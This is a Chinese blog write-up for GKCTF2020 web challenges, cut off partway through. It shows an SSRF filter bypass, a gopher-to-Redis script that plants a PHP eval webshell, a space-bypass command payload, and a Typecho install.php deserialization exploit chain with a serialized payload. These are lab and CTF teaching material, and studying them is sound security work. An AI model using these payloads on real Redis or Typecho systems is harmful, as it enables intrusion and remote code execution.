<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>【GKCTF2020】Web部分Writeup——PartII | Kee1ong&#39;s Blog</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="休息日补一下GKCTF Web部分剩下的题。 总的来说难度都不大，基本都是在现成的CVE上进行了更改。但自己做题时间有点过慢，估计还是不熟练吧。继续努力。 [GKCTF2020]EZ三剑客–EzWeb考点：SSRF bypass+Redis未授权进去后F12看源码，有注释提示：  那我们传个参试一下，应该是输出了ipconfig的结果。可以看到存在内网：173.37.86.X  结合题目输入框的U">
<meta property="og:type" content="article">
<meta property="og:title" content="【GKCTF2020】Web部分Writeup——PartII">
<meta property="og:url" content="https://kee1ong.github.io/2020/08/16/gkctf2/index.html">
<meta property="og:site_name" content="Kee1ong&#39;s Blog">
<meta property="og:description" content="休息日补一下GKCTF Web部分剩下的题。 总的来说难度都不大，基本都是在现成的CVE上进行了更改。但自己做题时间有点过慢，估计还是不熟练吧。继续努力。 [GKCTF2020]EZ三剑客–EzWeb考点：SSRF bypass+Redis未授权进去后F12看源码，有注释提示：  那我们传个参试一下，应该是输出了ipconfig的结果。可以看到存在内网：173.37.86.X  结合题目输入框的U">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813135842655.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813135923748.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813140636504.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813141704477.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813141726512.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813142417824.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813142847600.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813142937477.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813144218020.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813144236717.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813145957028.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813150049502.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813151810100.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813152022138.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813152108491.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814130811663.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814131358407.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814131454306.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814131555116.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814133223362.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814133147043.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814142140335.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814144136556.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814144358885.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814144541265.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814145036869.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814145202026.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814145251445.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814145639116.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814145650197.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200815095936218.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200815104138963.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200815110450713.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200815110602828.png">
<meta property="og:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200815110640730.png">
<meta property="article:published_time" content="2020-08-16T10:53:35.000Z">
<meta property="article:modified_time" content="2020-08-16T10:55:33.534Z">
<meta property="article:author" content="Kee1ongZ">
<meta property="article:tag" content="GKCTF2020">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813135842655.png">
  
    <link rel="alternate" href="/atom.xml" title="Kee1ong&#39;s Blog" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 5.0.2"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Kee1ong&#39;s Blog</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://kee1ong.github.io"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-gkctf2" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2020/08/16/gkctf2/" class="article-date">
  <time datetime="2020-08-16T10:53:35.000Z" itemprop="datePublished">2020-08-16</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      【GKCTF2020】Web部分Writeup——PartII
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <p>休息日补一下GKCTF Web部分剩下的题。</p>
<p>总的来说难度都不大，基本都是在现成的CVE上进行了更改。但自己做题时间有点过慢，估计还是不熟练吧。继续努力。</p>
<h1 id="GKCTF2020-EZ三剑客–EzWeb"><a href="#GKCTF2020-EZ三剑客–EzWeb" class="headerlink" title="[GKCTF2020]EZ三剑客–EzWeb"></a>[GKCTF2020]EZ三剑客–EzWeb</h1><h2 id="考点：SSRF-bypass-Redis未授权"><a href="#考点：SSRF-bypass-Redis未授权" class="headerlink" title="考点：SSRF bypass+Redis未授权"></a>考点：SSRF bypass+Redis未授权</h2><p>进去后F12看源码，有注释提示：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813135842655.png" alt="image-20200813135842655"></p>
<p>那我们传个参试一下，应该是输出了ipconfig的结果。可以看到存在内网：173.37.86.X</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813135923748.png" alt="image-20200813135923748"></p>
<p>结合题目输入框的URL，感觉就是SSRF题目了。</p>
<h3 id="P1-读源码"><a href="#P1-读源码" class="headerlink" title="P1:读源码"></a>P1:读源码</h3><p>这里第一反应就是先尝试用file协议读源码，发现被过滤。</p>
<p>这里bypass的方法有两种：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">一个斜杠 file:&#x2F;</span><br><span class="line">带空格  file :&#x2F;&#x2F;</span><br></pre></td></tr></table></figure>

<p>读取etc/passwd无果，看来是有限制。那么读取一下index.php源码，成功：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file:&#x2F;var&#x2F;www&#x2F;html&#x2F;index.php</span><br></pre></td></tr></table></figure>

<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813140636504.png" alt="image-20200813140636504"></p>
<p>主页源码如下:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">curl</span>(<span class="params">$url</span>)</span>&#123;  </span><br><span class="line">    $ch = curl_init();</span><br><span class="line">    curl_setopt($ch, CURLOPT_URL, $url);</span><br><span class="line">    curl_setopt($ch, CURLOPT_HEADER, <span class="number">0</span>);</span><br><span class="line">    <span class="keyword">echo</span> curl_exec($ch);</span><br><span class="line">    curl_close($ch);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">&#x27;submit&#x27;</span>]))&#123;</span><br><span class="line">        $url = $_GET[<span class="string">&#x27;url&#x27;</span>];</span><br><span class="line">        <span class="comment">//echo $url.&quot;\n&quot;;</span></span><br><span class="line">        <span class="keyword">if</span>(preg_match(<span class="string">&#x27;/file\:\/\/|dict|\.\.\/|127.0.0.1|localhost/is&#x27;</span>, $url,$match))</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">//var_dump($match);</span></span><br><span class="line">            <span class="keyword">die</span>(<span class="string">&#x27;别这样&#x27;</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        curl($url);</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_GET[<span class="string">&#x27;secret&#x27;</span>]))&#123;</span><br><span class="line">    system(<span class="string">&#x27;ifconfig&#x27;</span>);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p><code>file</code>，<code>dict</code>协议被ban。这里ban掉了dict协议感觉就是防（让）止（你）去探测内网存活主机的指纹。</p>
<h3 id="P2：探测存活主机-端口"><a href="#P2：探测存活主机-端口" class="headerlink" title="P2：探测存活主机+端口"></a>P2：探测存活主机+端口</h3><p>那么可以尝试利用<code>http</code>协议+BP抓包爆破来探测一下内网存活主机。方法很简单：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813141704477.png" alt="image-20200813141704477"></p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813141726512.png" alt="image-20200813141726512"></p>
<p>然后开始爆破，可以看到有好几台存活主机。在主机地址为10的时候发现了一句话：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813142417824.png" alt="image-20200813142417824"></p>
<p>很明显的提示了，那我们接着利用BP爆破端口：0~65535</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813142847600.png" alt="image-20200813142847600"></p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813142937477.png" alt="image-20200813142937477"></p>
<p>开了两把LOL跑完了，泪目。可以看到开启了80（http）和6379（Redis）。所以猜测存在Redis未授权。</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813144218020.png" alt="image-20200813144218020"></p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813144236717.png" alt="image-20200813144236717"></p>
<h3 id="P3：Redis未授权漏洞写shell"><a href="#P3：Redis未授权漏洞写shell" class="headerlink" title="P3：Redis未授权漏洞写shell"></a>P3：Redis未授权漏洞写shell</h3><p>不多说了。老问题：</p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/linuxsec/articles/11221756.html">https://www.cnblogs.com/linuxsec/articles/11221756.html</a></p>
<p>注意一下应用条件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1.gopher协议可用</span><br><span class="line">2.能访问redis服务器</span><br></pre></td></tr></table></figure>

<p>前面的过滤没有过滤gopher，那可以直接在绝对路径下写个webshell。</p>
<p>先给出构造的redis命令：生成一个<code>hjnb.php</code>，内容为GET参一句话。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">flushall</span><br><span class="line">set 1 &#39;&lt;?php eval($_GET[&quot;hj&quot;]);?&gt;&#39;</span><br><span class="line">config set dir &#x2F;var&#x2F;www&#x2F;html</span><br><span class="line">config set dbfilename hjnb.php</span><br><span class="line">save</span><br></pre></td></tr></table></figure>

<p>然后搬一个python2的生成脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line">protocol=<span class="string">&quot;gopher://&quot;</span></span><br><span class="line">ip=<span class="string">&quot;173.37.86.10&quot;</span></span><br><span class="line">port=<span class="string">&quot;6379&quot;</span></span><br><span class="line">shell=<span class="string">&quot;\n\n&lt;?php eval($_GET[\&quot;hj\&quot;]);?&gt;\n\n&quot;</span></span><br><span class="line">filename=<span class="string">&quot;hjnb.php&quot;</span></span><br><span class="line">path=<span class="string">&quot;/var/www/html&quot;</span></span><br><span class="line">passwd=<span class="string">&quot;&quot;</span></span><br><span class="line">cmd=[<span class="string">&quot;flushall&quot;</span>,</span><br><span class="line">     <span class="string">&quot;set 1 &#123;&#125;&quot;</span>.format(shell.replace(<span class="string">&quot; &quot;</span>,<span class="string">&quot;$&#123;IFS&#125;&quot;</span>)),</span><br><span class="line">     <span class="string">&quot;config set dir &#123;&#125;&quot;</span>.format(path),</span><br><span class="line">     <span class="string">&quot;config set dbfilename &#123;&#125;&quot;</span>.format(filename),</span><br><span class="line">     <span class="string">&quot;save&quot;</span></span><br><span class="line">     ]</span><br><span class="line"><span class="keyword">if</span> passwd:</span><br><span class="line">    cmd.insert(<span class="number">0</span>,<span class="string">&quot;AUTH &#123;&#125;&quot;</span>.format(passwd))</span><br><span class="line">payload=protocol+ip+<span class="string">&quot;:&quot;</span>+port+<span class="string">&quot;/_&quot;</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">redis_format</span>(<span class="params">arr</span>):</span></span><br><span class="line">    CRLF=<span class="string">&quot;\r\n&quot;</span></span><br><span class="line">    redis_arr = arr.split(<span class="string">&quot; &quot;</span>)</span><br><span class="line">    cmd=<span class="string">&quot;&quot;</span></span><br><span class="line">    cmd+=<span class="string">&quot;*&quot;</span>+str(len(redis_arr))</span><br><span class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> redis_arr:</span><br><span class="line">        cmd+=CRLF+<span class="string">&quot;$&quot;</span>+str(len((x.replace(<span class="string">&quot;$&#123;IFS&#125;&quot;</span>,<span class="string">&quot; &quot;</span>))))+CRLF+x.replace(<span class="string">&quot;$&#123;IFS&#125;&quot;</span>,<span class="string">&quot; &quot;</span>)</span><br><span class="line">    cmd+=CRLF</span><br><span class="line">    <span class="keyword">return</span> cmd</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    <span class="keyword">for</span> x <span class="keyword">in</span> cmd:</span><br><span class="line">        payload += urllib.quote(redis_format(x))</span><br><span class="line">    <span class="keyword">print</span> payload</span><br></pre></td></tr></table></figure>

<p>跑一下：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813145957028.png" alt="image-20200813145957028"></p>
<p>回到页面，直接扔输入框，提交：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813150049502.png" alt="image-20200813150049502"></p>
<p>之后在输入框访问该台主机下的我们写入的<code>hjnb.php</code>，已经成功写入：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813151810100.png" alt="image-20200813151810100"></p>
<p>然后就为所欲为了，注意命令执行要bypass空格，方法很多，$IFS，&lt;&gt;，%20等等。</p>
<p>这里使用通配符：<code>ls$IFS/</code>看下根目录，发现flag：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813152022138.png" alt="image-20200813152022138"></p>
<p>cat一下即可，最终payload：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;173.37.86.10&#x2F;hjnb.php?hj&#x3D;system(&#39;cat$IFS&#x2F;flag&#39;);</span><br></pre></td></tr></table></figure>

<p>成功获得flag：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200813152108491.png" alt="image-20200813152108491"></p>
<p>redis未授权除了可以写shell利用以外，也可以写ssh公钥连ssh/利用contrab反弹shell。是实战中也很重要的一个洞，多加利用。</p>
<h1 id="GKCTF2020-EZ三剑客-EzTypecho"><a href="#GKCTF2020-EZ三剑客-EzTypecho" class="headerlink" title="[GKCTF2020]EZ三剑客-EzTypecho"></a>[GKCTF2020]EZ三剑客-EzTypecho</h1><h2 id="考点：Typecho反序列化"><a href="#考点：Typecho反序列化" class="headerlink" title="考点：Typecho反序列化"></a>考点：Typecho反序列化</h2><p>这个18，19的省赛都涉及到了，也是个老考点了。不过这道题并不是单传的照搬CVE而是有了一定更改，还是出的很有价值的一道题。</p>
<h3 id="法1：原exp链-绕过session"><a href="#法1：原exp链-绕过session" class="headerlink" title="法1：原exp链+绕过session"></a>法1：原exp链+绕过session</h3><p>题目直接给了源码，是基于Typecho的一个站</p>
<p>这个组件最有名的洞就是<code>install.php</code>存在的反序列化getshell：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814130811663.png" alt="image-20200814130811663"></p>
<p>这篇已经写的非常详细了：审计+复现</p>
<p><a target="_blank" rel="noopener" href="https://www.freebuf.com/vuls/155753.html">https://www.freebuf.com/vuls/155753.html</a></p>
<p>我们就依葫芦画瓢一下。</p>
<p>首先要运行到反序列化的部分必须满足两个条件，这个题目中的<code>install.php</code>和复现文章的源码基本一样：</p>
<p><strong>1.Referer必须是本站</strong></p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814131358407.png" alt="image-20200814131358407"></p>
<p><strong>2.$_GET[‘finish’]不为空</strong></p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814131454306.png" alt="image-20200814131454306"></p>
<p>之后就可以看到反序列化漏洞点，不过这里相比于原漏洞这里多加了一个条件，必须存在session：</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814131555116.png" alt="image-20200814131555116"></p>
<p>搜一下，<code>session_start()</code>被注释了，真是小机灵鬼。</p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814133223362.png" alt="image-20200814133223362"></p>
<p>这个情况很像JarvisOJ里面的一道题phpinfo，涉及到session上传的一个机制。</p>
<p><a target="_blank" rel="noopener" href="https://www.php.net/manual/zh/session.upload-progress.php">https://www.php.net/manual/zh/session.upload-progress.php</a></p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814133147043.png" alt="image-20200814133147043"></p>
<p>同时session.upload_progress.name的默认值为：<strong>PHP_SESSION_UPLOAD_PROGRESS</strong></p>
<p><img src="https://kee1ongz.oss-cn-beijing.aliyuncs.com/img/image-20200814142140335.png" alt="image-20200814142140335"></p>
<p>划重点：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1.当一个上传在处理  -----随便向页面上传个文件</span><br><span class="line">2.同时POST一个与INI中设置的session.upload_progress.name同名变量时，上传进度可以在$_SESSION中获得。 ----POST一个PHP_SESSION_UPLOAD_PROGRESS&#x3D;xxxxx即可</span><br><span class="line">3.当PHP检测到这种POST请求时，它会在$_SESSION中添加一组数据——————也就是$_SESSION此时就不为空了</span><br></pre></td></tr></table></figure>

<p>OK，下面开始解题。</p>
<p>首先根据exp脚本生成payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$CMD = <span class="string">&#x27;phpinfo()&#x27;</span>;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Typecho_Feed</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">        <span class="keyword">const</span> RSS2 = <span class="string">&#x27;RSS 2.0&#x27;</span>;</span><br><span class="line">        <span class="keyword">const</span> ATOM1 = <span class="string">&#x27;ATOM 1.0&#x27;</span>;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">private</span> $_type;</span><br><span class="line">        <span class="keyword">private</span> $_items;</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">                <span class="comment">//$this-&gt;_type = $this::RSS2;</span></span><br><span class="line"></span><br><span class="line">                <span class="keyword">$this</span>-&gt;_type = <span class="keyword">$this</span>::ATOM1;</span><br><span class="line">                <span class="keyword">$this</span>-&gt;_items[<span class="number">0</span>] = <span class="keyword">array</span>(</span><br><span class="line">                        <span class="string">&#x27;category&#x27;</span> =&gt; <span class="keyword">array</span>(<span class="keyword">new</span> Typecho_Request()),</span><br><span class="line">                        <span class="string">&#x27;author&#x27;</span> =&gt; <span class="keyword">new</span> Typecho_Request(),</span><br><span class="line">                );</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Typecho_Request</span></span></span><br><span class="line"><span class="class"></span>&#123;</span><br><span class="line">        <span class="keyword">private</span> $_params = <span class="keyword">array</span>();</span><br><span class="line">        <span class="keyword">private</span> $_filter = <span class="keyword">array</span>();</span><br><span class="line"></span><br><span class="line">        <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__construct</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">                <span class="keyword">$this</span>-&gt;_params[<span class="string">&#x27;screenName&#x27;</span>] = $GLOBALS[CMD];</span><br><span class="line">                <span class="keyword">$this</span>-&gt;_filter[<span class="number">0</span>] = <span class="string">&#x27;assert&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">$exp = <span class="keyword">array</span>(</span><br><span class="line">        <span class="string">&#x27;adapter&#x27;</span> =&gt; <span class="keyword">new</span> Typecho_Feed(),</span><br><span class="line">        <span class="string">&#x27;prefix&#x27;</span>  =&gt; <span class="string">&#x27;typecho_&#x27;</span></span><br><span class="line">);</span><br><span class="line"></span><br><span class="line"><span class="keyword">echo</span> base64_encode(serialize($exp));</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>那么payload为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__typecho_config&#x3D;YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo4OiJBVE9NIDEuMCI7czoyMDoiAFR5cGVjaG9fRmVlZABfaXRlbXMiO2E6MTp7aTowO2E6Mjp7czo4OiJjYXRlZ29yeSI7YToxOntpOjA7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo5OiJwaHBpbmZvKCkiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX1zOjY6ImF1dGhvciI7TzoxNToiVHlwZWNob19SZXF1ZXN0IjoyOntzOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9wYXJhbXMiO2E6MTp7czoxMDoic2NyZWVuTmFtZSI7czo5OiJwaHBpbmZvKCkiO31zOjI0OiIAVHlwZWNob19SZXF1ZXN0AF9maWx0ZXIiO2E6MTp7aTowO3M6NjoiYXNzZXJ0Ijt9fX19fXM6NjoicHJlZml4IjtzOjg6InR5cGVjaG9fIjt9</span><br></pre></td></tr></table></figure>

<p>文章中提到，Payload可以通过插入Cookie提交，也可以通过POST提交。</p>
<p>因为POST我们要提交PHP_SESSION_UPLOAD_PROGRESS。所以这里改用cookie提交。</p>
<p>此外，别忘了加上Referer头(内容为靶机地址)以及<code>?finish</code>。</p>
<p>Python脚本如下，我们将回显的结果在本地保存为html页面：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"></span><br><span class="line">url = <span class="string">&quot;http://f905337f-89e3-497a-9a74-a7e00c4a4171.node3.buuoj.cn/install.php?finish=1&quot;</span></span><br><span class="line">files=&#123;<span class="string">&#x27;lcz&#x27;</span>:<span class="string">&quot;nb&quot;</span>&#125;</span><br><span class="line">headers = &#123;<span class="string">&#x27;cookie&#x27;</span>:<span 